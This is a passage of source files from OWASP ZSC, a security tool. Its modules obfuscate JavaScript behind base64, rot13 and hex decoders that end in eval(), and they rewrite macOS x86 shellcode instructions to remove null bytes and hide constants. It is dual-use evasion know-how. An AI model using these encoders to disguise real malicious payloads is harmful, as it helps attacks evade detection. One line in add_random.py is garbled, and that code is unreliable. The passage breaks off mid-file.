#!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | 15 | 16 | def encode(f): 17 | base64_arr = '' 18 | val_name = ''.join( 19 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 20 | for i in range(50)) 21 | data = '' 22 | if _version is 2: 23 | data = val_name + ' = "' + str(binascii.b2a_base64(f)).replace( 24 | '\n', '') + '";' 25 | 26 | if _version is 3: 27 | data = val_name + ' = "' + str(binascii.b2a_base64(f.encode( 28 | 'latin-1')).decode('latin-1').replace('\n', '')) + '"' 29 | 30 | var_b64 = ''.join( 31 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 32 | for i in range(50)) 33 | var_str = ''.join( 34 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 35 | for i in range(50)) 36 | var_data = ''.join( 37 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 38 | for i in range(50)) 39 | func_name = ''.join( 40 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 41 | for i in range(50)) 42 | func_argv = ''.join( 43 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 44 | for i in range(50)) 45 | f = ''' 46 | %s 47 | function %s(%s) { 48 | var %s = %s.toString(); 49 | var %s = window.atob(%s) 50 | return %s; 51 | } 52 | %s = %s; 53 | eval(%s(%s));''' % (data, func_name, func_argv, var_b64, func_argv, var_str, 54 | var_b64, var_str, var_data, val_name, func_name, var_data) 55 | return f 56 | 57 | 58 | def start(content,cli): 59 | return str(str('/*\n') + str(content.replace('*/', '*_/')) + str('\n*/') + 60 | str(encode(content)) + str('\n')) 61 | -------------------------------------------------------------------------------- /lib/encoder/javascript/rot13.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | import codecs 13 | from core.compatible import version 14 | _version = version() 15 | 16 | 17 | def encode(f): 18 | base64_arr = '' 19 | val_name = ''.join( 20 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 21 | for i in range(50)) 22 | data = '' 23 | if _version is 2: 24 | data = val_name + '= ` ' + str(f.encode("rot13")) + '`;' 25 | if _version is 3: 26 | data = val_name + '= `' + str(codecs.encode(f, "rot-13")) + '`;' 27 | var_b64 = ''.join( 28 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 29 | for i in range(50)) 30 | var_str = ''.join( 31 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 32 | for i in range(50)) 33 | var_data = ''.join( 34 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 35 | for i in range(50)) 36 | func_name = ''.join( 37 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 38 | for i in range(50)) 39 | func_argv = ''.join( 40 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 41 | for i in range(50)) 42 | f = ''' 43 | %s 44 | function rot(s) { 45 | return s.replace(/[a-zA-Z]/g, function (c) { 46 | return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26); 47 | }); 48 | } 49 | function %s(%s) { 50 | return rot(%s); 51 | 52 | 53 | } 54 | eval(%s(%s));''' % (data, func_name, func_argv, func_argv, func_name, val_name) 55 | return f 56 | 57 | 58 | def start(content,cli): 59 | return str(str('/*\n') + str(content.replace('*/', '*_/')) + str('\n*/') + 60 | str(encode(content)) + str('\n')) 61 | -------------------------------------------------------------------------------- /lib/encoder/javascript/simple_ascii.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random 10 | import string 11 | 12 | def encode(f): 13 | var_name = ''.join( 14 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 15 | for i in range(50)) 16 | ascii_data = ''.join([str(ord(i))+'*' for i in f])[:-1] 17 | data = var_name + ' = "' + ascii_data + '"' 18 | var_data = ''.join( 19 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 20 | for i in range(50)) 21 | var_counter = ''.join( 22 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 23 | for i in range(50)) 24 | var_str = ''.join( 25 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 26 | for i in range(50)) 27 | var_ascii = ''.join( 28 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 29 | for i in range(50)) 30 | func_name = ''.join( 31 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 32 | for i in range(50)) 33 | func_argv = ''.join( 34 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 35 | for i in range(50)) 36 | f = ''' 37 | %s 38 | function %s(%s) { 39 | var %s = ''; 40 | var %s = %s.split("*"); 41 | for(var %s = 0; %s < %s.length; %s++){ 42 | %s += String.fromCharCode(%s[%s]); 43 | } 44 | return %s; 45 | } 46 | %s = %s 47 | eval(%s(%s)) 48 | ''' % (data, func_name, func_argv, var_str, var_ascii, func_argv, var_counter, var_counter, var_ascii, var_counter, 49 | var_str, var_ascii, var_counter, var_str, var_data, var_name, func_name, var_data) 50 | return f 51 | 52 | 53 | def start(content,cli): 54 | return str(str('/*\n') + str(content.replace('*/', '*_/')) + str('\n*/') + 55 | str(encode(content)) + str('\n')) 56 | -------------------------------------------------------------------------------- /lib/encoder/javascript/simple_base64_rev.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | 15 | 16 | def encode(f): 17 | var_name = ''.join( 18 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 19 | for i in range(50)) 20 | 21 | if _version is 2: 22 | rev_data = binascii.b2a_base64(f)[-2::-1] 23 | data = var_name + ' = "' + str(rev_data) + '"' 24 | if _version is 3: 25 | rev_data = binascii.b2a_base64(f.encode('utf8')).decode('utf8')[-2::-1] 26 | data = var_name + ' = "' + str(rev_data) + '"' 27 | var_b64 = ''.join( 28 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 29 | for i in range(50)) 30 | var_str = ''.join( 31 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 32 | for i in range(50)) 33 | var_data = ''.join( 34 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 35 | for i in range(50)) 36 | func_name = ''.join( 37 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 38 | for i in range(50)) 39 | func_argv = ''.join( 40 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 41 | for i in range(50)) 42 | f = ''' 43 | %s 44 | function %s(%s) { 45 | var %s = %s.split("").reverse().join(""); 46 | var %s = window.atob(%s) 47 | return %s; 48 | } 49 | %s = %s; 50 | eval(%s(%s));''' % (data, func_name, func_argv, var_b64, func_argv, var_str, 51 | var_b64, var_str, var_data, var_name, func_name, var_data) 52 | return f 53 | 54 | 55 | def start(content,cli): 56 | return str(str('/*\n') + str(content.replace('*/', '*_/')) + str('\n*/') + 57 | str(encode(content)) + str('\n')) 58 | -------------------------------------------------------------------------------- /lib/encoder/javascript/simple_hex.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | 15 | 16 | def encode(f): 17 | hex_arr = [] 18 | val_names = [] 19 | data = '' 20 | eval = '' 21 | n = 0 22 | m = 0 23 | for line in f: 24 | if _version is 2: 25 | hex_arr.append(str(binascii.b2a_hex(line))) 26 | if _version is 3: 27 | hex_arr.append(str((binascii.b2a_hex(str(line).encode('latin-1')) 28 | ).decode('latin-1'))) 29 | length = len(hex_arr) 30 | while (length != 0): 31 | val_names.append(''.join(random.choice(string.ascii_lowercase + 32 | string.ascii_uppercase) 33 | for i in range(50))) 34 | length -= 1 35 | for hex in hex_arr: 36 | data += val_names[n] + ' = "' + str(hex) + '";\n' 37 | n += 1 38 | while (m <= n - 1): 39 | eval += val_names[m] + '+' 40 | m += 1 41 | var_hex = ''.join( 42 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 43 | for i in range(50)) 44 | var_str = ''.join( 45 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 46 | for i in range(50)) 47 | var_counter = ''.join( 48 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 49 | for i in range(50)) 50 | var_data = ''.join( 51 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 52 | for i in range(50)) 53 | func_name = ''.join( 54 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 55 | for i in range(50)) 56 | func_argv = ''.join( 57 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 58 | for i in range(50)) 59 | f = ''' 60 | %s 61 | function %s(%s) { 62 | var %s = %s.toString(); 63 | var %s = ''; 64 | for (var %s = 0; %s < %s.length; %s += 2) 65 | %s += String.fromCharCode(parseInt(%s.substr(%s, 2), 16)); 66 | return %s; 67 | } 68 | %s = %s; 69 | eval(%s(%s));''' % (data, func_name, func_argv, var_hex, func_argv, var_str, 70 | var_counter, var_counter, var_hex, var_counter, var_str, 71 | var_hex, var_counter, var_str, var_data, eval[:-1], 72 | func_name, var_data) 73 | return f 74 | 75 | 76 | def start(content,cli): 77 | return str(str('/*\n') + str(content.replace('*/', '*_/')) + str('\n*/') + 78 | str(encode(content)) + str('\n')) 79 | -------------------------------------------------------------------------------- /lib/encoder/javascript/simple_hex_rev.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | 15 | 16 | def encode(f): 17 | var_name = ''.join( 18 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 19 | for i in range(50)) 20 | 21 | if _version is 2: 22 | rev_data = binascii.b2a_hex(f)[::-1] 23 | data = var_name + ' = "' + str(rev_data) + '"' 24 | if _version is 3: 25 | rev_data = binascii.b2a_hex(f.encode('utf8')).decode('utf8')[::-1] 26 | data = var_name + ' = "' + str(rev_data) + '"' 27 | var_hex = ''.join( 28 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 29 | for i in range(50)) 30 | var_str = ''.join( 31 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 32 | for i in range(50)) 33 | var_data = ''.join( 34 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 35 | for i in range(50)) 36 | var_counter = ''.join( 37 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 38 | for i in range(50)) 39 | func_name = ''.join( 40 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 41 | for i in range(50)) 42 | func_argv = ''.join( 43 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 44 | for i in range(50)) 45 | f = ''' 46 | %s 47 | function %s(%s) { 48 | var %s = %s.split('').reverse().join(''); 49 | var %s = ''; 50 | for (var %s = 0; %s < %s.length; %s += 2) 51 | %s += String.fromCharCode(parseInt(%s.substr(%s, 2), 16)); 52 | return %s; 53 | } 54 | %s = %s; 55 | eval(%s(%s));''' % (data, func_name, func_argv, var_hex, func_argv, var_str, 56 | var_counter, var_counter, var_hex, var_counter, var_str, 57 | var_hex, var_counter, var_str, var_data, var_name, 58 | func_name, var_data) 59 | return f 60 | 61 | 62 | def start(content,cli): 63 | return str(str('/*\n') + str(content.replace('*/', '*_/')) + str('\n*/') + 64 | str(encode(content)) + str('\n')) 65 | -------------------------------------------------------------------------------- /lib/encoder/linux_x86/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/encoder/osx_x86/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/encoder/osx_x86/add_random.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random, binascii, string 10 | from core.compatible import version 11 | _version = version() 12 | chars = string.digits + string.ascii_letters 13 | 14 | def start(shellcode, job): 15 | if "exec" == job: 16 | t = True 17 | eax = str('0x3b') 18 | while t: 19 | if _version is 2: 20 | eax_1 = binascii.b2a_hex(''.join(random.choice(chars) 21 | for i in range(1))) 22 | if _version is 3: 23 | eax_1 = (binascii.b2a_hex((''.join(random.choice(chars) for i in range(1))).encode('latin-1'))).decode('latin-1') 24 | eax_1 = str('0') + str(eax_1[1]) 25 | eax_2 = "%x" % (int(eax, 16) - int(eax_1, 16)) 26 | if eax > eax_1: 27 | if '00' not in str(eax_1) and '00' not in str(eax_2): 28 | t = False 29 | 30 | A = 0 31 | eax = 'push $%s' % (str(eax)) 32 | if '-' in eax_2: 33 | A = 1 34 | eax_2 = eax_2.replace('-', '') 35 | eax_add = 'push $0x%s\npop %%eax\nneg %%eax\nadd $0x%s,%%eax\n' % (eax_2, eax_1) 36 | 37 | if A is 0: 38 | eax_add = 'push $0x%s\npop %%eax\nadd $0x%s,%%eax\n' % (eax_2,eax_1) 39 | shellcode = shellcode.replace('mov $0x3b,%al', eax_add) 40 | 41 | for line in shellcode.rsplit('\n'): 42 | if 'push' in line and '$0x' in line and ',' not in line and len(line) > 14: 43 | data = line.rsplit('push')[1].rsplit('$0x')[1] 44 | t = True 45 | while t: 46 | if _version is 2: 47 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars)for i in range(4))) 48 | if _version is 3: 49 | ebx_1 = (binascii.b2a_hex((''.join(random.choice(chars) for i in range(4))).encode('latin-1'))).decode('latin-1') 50 | ebx_2 = "%x" % (int(data, 16) - int(ebx_1, 16)) 51 | if str('00') not in str(ebx_1) and str('00') not in str(ebx_2) and '-' in ebx_2 and len(ebx_2.replace('-', '')) >= 7 and len(ebx_1) >= 7 and '-' not in ebx_1: 52 | ebx_2 = ebx_2.replace('-', '') 53 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nneg %%eax\nadd %%ebx,%%eax\npush %%eax\n' % (str(ebx_1), str(ebx_2)) 54 | shellcode = shellcode.replace(line, command) 55 | t = False 56 | if 'system' == job: 57 | 58 | for line in shellcode.rsplit('\n'): 59 | if 'push' in line and '$0x' in line and ',' not in line and len(line) > 14: 60 | # print(line) 61 | data = line.rsplit('push')[1].rsplit('$0x')[1] 62 | # print(data) 63 | t = True 64 | while t: 65 | if _version is 2: 66 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars)for i in range(4))) 67 | 68 | if _version is 3: 69 | ebx_1 = (binascii.b2a_hex((''.join(random.choice( 70 | chars) for i in range(4))).encode('latin-1')) 71 | ).decode('latin-1') 72 | if data= 7 and len(ebx_1) >= 7 and '-' not in ebx_1: 75 | ebx_2 = ebx_2.replace('-', '') 76 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nneg %%eax\nadd %%ebx,%%eax\npush %%eax\n' % (str(ebx_1), str(ebx_2)) 77 | shellcode = shellcode.replace(line, command) 78 | t = False 79 | return shellcode 80 | -------------------------------------------------------------------------------- /lib/encoder/osx_x86/add_yourvalue.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | def start(type, shellcode, job): 11 | if "exec" == job: 12 | value = str(type.rsplit('add_')[1][2:]) 13 | t = True 14 | eax = str('0x3b909090') 15 | eax_1 = value 16 | eax_2 = "%x" % (int(eax, 16) - int(eax_1, 16)) 17 | A = 0 18 | eax = 'push $%s' % (str(eax)) 19 | if '-' in eax_2: 20 | A = 1 21 | eax_2 = eax_2.replace('-', '') 22 | eax_add = 'push $0x%s\npop %%eax\nneg %%eax\nadd $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 23 | eax_2, eax_1) 24 | 25 | if A is 0: 26 | eax_add = 'push $0x%s\npop %%eax\nadd $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 27 | eax_2, eax_1) 28 | shellcode = shellcode.replace('mov $0x3b,%al', eax_add) 29 | A = 0 30 | for line in shellcode.rsplit('\n'): 31 | if '_z3r0d4y_' in line: 32 | A = 1 33 | if 'push' in line and '$0x' in line and ',' not in line and len( 34 | line) > 14 and A is 1: 35 | data = line.rsplit('push')[1].rsplit('$0x')[1] 36 | t = True 37 | while t: 38 | ebx_1 = value 39 | ebx_2 = "%x" % (int(data, 16) - int(ebx_1, 16)) 40 | 41 | if str('00') not in str(ebx_1) and str('00') not in str( 42 | ebx_2) and len(ebx_2) >= 7 and len( 43 | ebx_1) >= 7 and '-' not in ebx_1: 44 | ebx_2 = ebx_2.replace('-', '') 45 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nadd %%ebx,%%eax\npush %%eax\n' % ( 46 | str(ebx_1), str(ebx_2)) 47 | shellcode = shellcode.replace(line, command) 48 | t = False 49 | shellcode = shellcode.replace('_z3r0d4y_', '') 50 | 51 | if "system" == job: 52 | value = str(type.rsplit('add_')[1][2:]) 53 | 54 | for line in shellcode.rsplit('\n'): 55 | if 'push' in line and '$0x' in line and ',' not in line and len( 56 | line) > 14: 57 | data = line.rsplit('push')[1].rsplit('$0x')[1] 58 | ebx_1 = value 59 | ebx_2 = "%x" % (int(data, 16) - int(ebx_1, 16)) 60 | A = 0 61 | if str('-') in str(ebx_2): 62 | ebx_2 = ebx_2.replace('-', '') 63 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nneg %%eax\nadd %%ebx,%%eax\npush %%eax\n' % ( 64 | str(ebx_1), str(ebx_2)) 65 | A = 1 66 | if A is 0: 67 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nadd %%ebx,%%eax\npush %%eax\n' % ( 68 | str(ebx_1), str(ebx_2)) 69 | shellcode = shellcode.replace(line, command) 70 | 71 | 72 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/dec.py: -------------------------------------------------------------------------------- 1 | def start(shellcode, job): 2 | if "exec" == job: 3 | t = True 4 | eax = str('0x3b909090') 5 | eax_2 = "%x" % (int(eax, 16) + int('0x01', 16)) 6 | A = 0 7 | eax = 'push $%s' % (str(eax)) 8 | if '-' in eax_2: 9 | A = 1 10 | eax_2 = eax_2.replace('-', '') 11 | eax_add = 'push $0x%s\npop %%eax\ndec %%eax\nneg %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 12 | eax_2) 13 | 14 | if A is 0: 15 | eax_add = 'push $0x%s\npop %%eax\ndec %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 16 | eax_2) 17 | shellcode = shellcode.replace('mov $0x3b,%al', eax_add) 18 | 19 | A = 0 20 | for line in shellcode.rsplit('\n'): 21 | if '_z3r0d4y_' in line: 22 | A = 1 23 | if 'push' in line and '$0x' in line and ',' not in line and len( 24 | line) > 14 and A is 1: 25 | data = line.rsplit('push')[1].rsplit('$0x')[1] 26 | ebx_2 = "%x" % (int(data, 16) + int('0x01', 16)) 27 | command = '\npush $0x%s\npop %%ebx\ndec %%ebx\npush %%ebx\n' % ( 28 | str(ebx_2)) 29 | shellcode = shellcode.replace(line, command) 30 | shellcode = shellcode.replace('_z3r0d4y_', '') 31 | 32 | if "system" == job: 33 | for line in shellcode.rsplit('\n'): 34 | if 'push' in line and '$0x' in line and ',' not in line and len( 35 | line) > 14: 36 | data = line.rsplit('push')[1].rsplit('$0x')[1] 37 | ebx_2 = "%x" % (int(data, 16) + int('01', 16)) 38 | command = '\npush $0x%s\npop %%eax\ndec %%eax\npush %%eax\n' % (str(ebx_2)) 39 | shellcode = shellcode.replace(line, command) 40 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/dec_timesyouwant.py: -------------------------------------------------------------------------------- 1 | def start(type, shellcode, job): 2 | if "exec" == job: 3 | times = int(type.rsplit('dec_')[1]) 4 | t = True 5 | eax_2, eax = str('0x3b909090'), str('0x3b909090') 6 | n = 0 7 | while n < times: 8 | eax_2 = "%x" % (int(eax_2, 16) + int('0x01', 16)) 9 | n += 1 10 | dec = 'dec %eax\n' * n 11 | A = 0 12 | eax = 'push $%s' % (str(eax)) 13 | if '-' in eax_2: 14 | A = 1 15 | eax_2 = eax_2.replace('-', '') 16 | eax_add = 'push $0x%s\npop %%eax\n%s\nneg %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 17 | eax_2, dec) 18 | 19 | if A is 0: 20 | eax_add = 'push $0x%s\npop %%eax\n%s\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 21 | eax_2, dec) 22 | shellcode = shellcode.replace('mov $0x3b,%al', eax_add) 23 | 24 | A = 0 25 | for line in shellcode.rsplit('\n'): 26 | if '_z3r0d4y_' in line: 27 | A = 1 28 | if 'push' in line and '$0x' in line and ',' not in line and len( 29 | line) > 14 and A is 1: 30 | ebx_2 = line.rsplit('push')[1].rsplit('$0x')[1] 31 | n = 0 32 | while n < times: 33 | ebx_2 = "%x" % (int(ebx_2, 16) + int('0x01', 16)) 34 | n += 1 35 | dec = 'dec %ebx\n' * n 36 | command = '\npush $0x%s\npop %%ebx\n%s\npush %%ebx\n' % ( 37 | str(ebx_2), dec) 38 | shellcode = shellcode.replace(line, command) 39 | shellcode = shellcode.replace('_z3r0d4y_', '') 40 | if "system" == job: 41 | times = int(type.rsplit('dec_')[1]) 42 | for line in shellcode.rsplit('\n'): 43 | if 'push' in line and '$0x' in line and ',' not in line and len( 44 | line) > 14: 45 | ebx_2 = line.rsplit('push')[1].rsplit('$0x')[1] 46 | n = 0 47 | while n < times: 48 | ebx_2 = "%x" % (int(ebx_2, 16) + int('01', 16)) 49 | n += 1 50 | dec = 'dec %eax\n' * n 51 | command = '\npush $0x%s\npop %%eax\n%spush %%eax\n' % ( 52 | str(ebx_2), str(dec)) 53 | shellcode = shellcode.replace(line, command) 54 | 55 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/inc.py: -------------------------------------------------------------------------------- 1 | def start(shellcode, job): 2 | if job == "exec": 3 | t = True 4 | eax = str('0x3b909090') 5 | eax_2 = "%x" % (int(eax, 16) - int('0x01', 16)) 6 | A = 0 7 | eax = 'push $%s' % (str(eax)) 8 | if '-' in eax_2: 9 | A = 1 10 | eax_2 = eax_2.replace('-', '') 11 | eax_add = 'push $0x%s\npop %%eax\ninc %%eax\nneg %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 12 | eax_2) 13 | 14 | if A is 0: 15 | eax_add = 'push $0x%s\npop %%eax\ninc %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 16 | eax_2) 17 | shellcode = shellcode.replace('mov $0x3b,%al', eax_add) 18 | 19 | A = 0 20 | for line in shellcode.rsplit('\n'): 21 | if '_z3r0d4y_' in line: 22 | A = 1 23 | if 'push' in line and '$0x' in line and ',' not in line and len( 24 | line) > 14 and A is 1: 25 | data = line.rsplit('push')[1].rsplit('$0x')[1] 26 | ebx_2 = "%x" % (int(data, 16) - int('0x01', 16)) 27 | command = '\npush $0x%s\npop %%ebx\ninc %%ebx\npush %%ebx\n' % ( 28 | str(ebx_2)) 29 | shellcode = shellcode.replace(line, command) 30 | shellcode = shellcode.replace('_z3r0d4y_', '') 31 | if job == "system": 32 | for line in shellcode.rsplit('\n'): 33 | if 'push' in line and '$0x' in line and ',' not in line and len( 34 | line) > 14: 35 | data = line.rsplit('push')[1].rsplit('$0x')[1] 36 | ebx_2 = "%x" % (int(data, 16) - int('01', 16)) 37 | command = '\npush $0x%s\npop %%eax\ninc %%eax\npush %%eax\n' % ( 38 | str(ebx_2)) 39 | shellcode = shellcode.replace(line, command) 40 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/inc_timesyouwant.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | 11 | def start(type, shellcode, job): 12 | if "exec" == job: 13 | times = int(type.rsplit('inc_')[1]) 14 | t = True 15 | eax_2, eax = str('0x3b909090'), str('0x3b909090') 16 | n = 0 17 | while n < times: 18 | eax_2 = "%x" % (int(eax_2, 16) - int('0x01', 16)) 19 | n += 1 20 | inc = 'inc %eax\n' * n 21 | A = 0 22 | eax = 'push $%s' % (str(eax)) 23 | if '-' in eax_2: 24 | A = 1 25 | eax_2 = eax_2.replace('-', '') 26 | eax_add = 'push $0x%s\npop %%eax\n%s\nneg %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 27 | eax_2, inc) 28 | 29 | if A is 0: 30 | eax_add = 'push $0x%s\npop %%eax\n%s\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 31 | eax_2, inc) 32 | shellcode = shellcode.replace('mov $0x3b,%al', eax_add) 33 | 34 | A = 0 35 | for line in shellcode.rsplit('\n'): 36 | if '_z3r0d4y_' in line: 37 | A = 1 38 | if 'push' in line and '$0x' in line and ',' not in line and len( 39 | line) > 14 and A is 1: 40 | ebx_2 = line.rsplit('push')[1].rsplit('$0x')[1] 41 | n = 0 42 | while n < times: 43 | ebx_2 = "%x" % (int(ebx_2, 16) - int('0x01', 16)) 44 | n += 1 45 | inc = 'inc %ebx\n' * n 46 | command = '\npush $0x%s\npop %%ebx\n%s\npush %%ebx\n' % ( 47 | str(ebx_2), inc) 48 | shellcode = shellcode.replace(line, command) 49 | shellcode = shellcode.replace('_z3r0d4y_', '') 50 | 51 | if "system" == job: 52 | for line in shellcode.rsplit('\n'): 53 | if 'push' in line and '$0x' in line and ',' not in line and len( 54 | line) > 14: 55 | ebx_2 = line.rsplit('push')[1].rsplit('$0x')[1] 56 | n = 0 57 | while n < times: 58 | ebx_2 = "%x" % (int(ebx_2, 16) - int('01', 16)) 59 | n += 1 60 | inc = 'inc %eax\n' * n 61 | command = '\npush $0x%s\npop %%eax\n%spush %%eax\n' % ( 62 | str(ebx_2), str(inc)) 63 | shellcode = shellcode.replace(line, command) 64 | 65 | 66 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/sub_random.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random, binascii, string 10 | from core.compatible import version 11 | _version = version() 12 | chars = string.digits + string.ascii_letters 13 | 14 | 15 | def start(shellcode, job): 16 | 17 | if job == "exec": 18 | t = True 19 | eax = str('0x3b') 20 | while t: 21 | if _version is 2: 22 | eax_1 = 